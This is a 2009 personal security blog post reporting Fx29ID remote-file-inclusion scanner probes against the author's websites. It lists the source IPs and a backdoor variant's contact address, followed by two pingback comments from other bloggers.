// you’re reading...

Security

Fx29ID cmd

By David May 8, 2009 Email This Post Email This Post Print This Post Print This Post Post a comment
Filed Under  

imagem-32FeeLCoMz RFI scanner is again scanning for possible injection on a couple of my websites.

This time using the following IPs :

210.68.188.206 (Taiwan)
125.251.133.3 (Republic of Korea)

And a possible hacked website for hosting the cmd file remember.txt
After searching a bit, I found out 969 search results for the infected website so is has been busy for a while.

imagem-51Also got the original Fx29ID code and I already got three variants of it. One of them has a simple base64 encoded backdoor that emails the infected host to xmair_bardj at hotmail.com, this email does not exist anymore, so maybe it was reported or just cancelled.

Discussion

2 comments for “Fx29ID cmd”

  1. [...] probes are now being dealt with in real time. See Fx29ID cmd for a little more [...]

    Posted by Fighting Bots Via Their Bad Requests - PlanetMike's Technology Journal | June 7, 2009, 3:46 pm
    Reply to this comment

  2. [...] I did some Googling for Fx29ID and found this blog post. It looks to be a rather sophisticated web server based exploit/scanning tool. This is the kind of [...]

    Posted by Blog / Fx29ID bot scans - Photography by Kieran Simkin | July 20, 2009, 10:51 pm
    Reply to this comment

Post a comment